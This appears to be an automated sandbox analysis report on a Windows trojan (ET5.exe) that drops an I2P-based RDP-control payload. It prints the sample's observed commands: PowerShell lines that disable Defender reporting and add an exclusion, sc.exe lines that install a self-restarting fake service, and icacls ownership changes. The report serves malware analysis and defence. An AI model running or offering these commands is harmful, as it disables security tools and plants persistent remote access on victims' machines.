Source: ET5.exeString found in binary or memory: http://digitalbush.com/projects/masked-input-plugin/#license)
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: http://identiguy.i2p/hosts.txt
Source: update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 00000016.00000002.4536791919.000001B980F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txtySDD
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: http://rus.i2p/hosts.txt
Source: update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/
Source: main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3C
Source: main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtxyz/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: ET5.exeString found in binary or memory: http://www.mozilla.org/editor/midasdemo/securityprefs.html
Source: ET5.exeString found in binary or memory: http://www.steema.com/linkIn/TeeChartForXE2
Source: ET5.exeString found in binary or memory: http://www.steema.com/linkIn/TeeChartForXE2H
Source: ET5.exeString found in binary or memory: http://www.steema.com/linkIn/TeeChartForXE2UH
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://banana.incognet.io/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://i2p.ghativega.in/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: https://i2p.mooo.com/netDb/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://i2p.novg.net/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: https://netdb.i2p2.no/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://reseed-fr.i2pd.xyz/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://reseed-pl.i2pd.xyz/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://reseed.diva.exchange/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: https://reseed.i2p-projekt.de/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://reseed.i2pgit.org/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://reseed.memcpy.io/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://reseed.onion.im/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://reseed.stormycloud.org/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://reseed2.i2p.net/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://www2.mk16.de/
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF70489929A inet_addr,ntohl,11_2_00007FF70489929A
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF70489292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,11_2_00007FF70489292E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile deleted: C:\Windows\Temp\PrnaubOU
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll 77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
Source: C:\Windows\System32\icacls.exeProcess token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: String function: 00007FF7048914E2 appears 295 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8B9181292 appears 515 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BFB81292 appears 377 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BFABA202 appears 345 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BFB52FD2 appears 387 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BA501292 appears 394 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF7088799E2 appears 303 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8B9151292 appears 462 times
Source: rVtDGbMQ.22.drStatic PE information: Number of sections : 11 > 10
Source: termsrv32.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: L0FsI2PI.22.drStatic PE information: Number of sections : 11 > 10
Source: samctl.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: gBXHuZY0.22.drStatic PE information: Number of sections : 11 > 10
Source: cnccli.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: y8J74cEH.22.drStatic PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: ypqwg32t.22.drStatic PE information: Number of sections : 11 > 10
Source: ET5.exeStatic PE information: Number of sections : 11 > 10
Source: evtsrv.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: 3rVpJMV7.22.drStatic PE information: Number of sections : 11 > 10
Source: fYg6Jeg5.22.drStatic PE information: Number of sections : 11 > 10
Source: libi2p.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: prgmgr.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: rmcjgYnL.22.drStatic PE information: Number of sections : 11 > 10
Source: rdpctl.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: ET5.exe, 00000000.00000000.2042011361.000000000115D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIntegrator.exe@ vs ET5.exe
Source: ET5.exe, 00000000.00000002.2048458739.00000000031B6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs ET5.exe
Source: ET5.exe, 00000002.00000002.4528360552.0000000003036000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs ET5.exe
Source: ET5.exeBinary or memory string: OriginalFilenameIntegrator.exe@ vs ET5.exe
Source: classification engineClassification label: mal100.troj.evad.winEXE@38/76@0/37
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF70489855D CreateToolhelp32Snapshot,Process32First,Process32Next,GetLastError,GetLastError,GetLastError,OpenProcess,QueryFullProcessImageNameW,GetLastError,CloseHandle,GetLastError,CloseHandle,11_2_00007FF70489855D
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF7048AB558 DeleteCriticalSection,FindClose,FindNextFileA,FindResourceA,11_2_00007FF7048AB558
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF708878C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,22_2_00007FF708878C4A
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5284:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:652:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3836:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4072:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03
Source: C:\Users\user\Desktop\ET5.exeFile created: C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.bat
Source: C:\Users\user\Desktop\ET5.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.bat"
Source: ET5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ET5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\ET5.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeFile read: C:\Users\user\AppData\Local\Temp\wfpblk.ini
Source: C:\Users\user\Desktop\ET5.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: ET5.exeString found in binary or memory: gfx/loading.gif">
Source: ET5.exeString found in binary or memory: /gfx/loading.gif
Source: ET5.exeString found in binary or memory: gfx/loading.gif
Source: ET5.exeString found in binary or memory: Execute via &Default browser/Launch default browser and execute application.
Source: unknownProcess created: C:\Users\user\Desktop\ET5.exe "C:\Users\user\Desktop\ET5.exe"
Source: unknownProcess created: C:\Users\user\Desktop\ET5.exe C:\Users\user\Desktop\ET5.exe
Source: C:\Users\user\Desktop\ET5.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\Desktop\ET5.exeProcess created: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe "C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe"
Source: C:\Users\user\Desktop\ET5.exeProcess created: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe "C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe"
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ET5.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\ET5.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
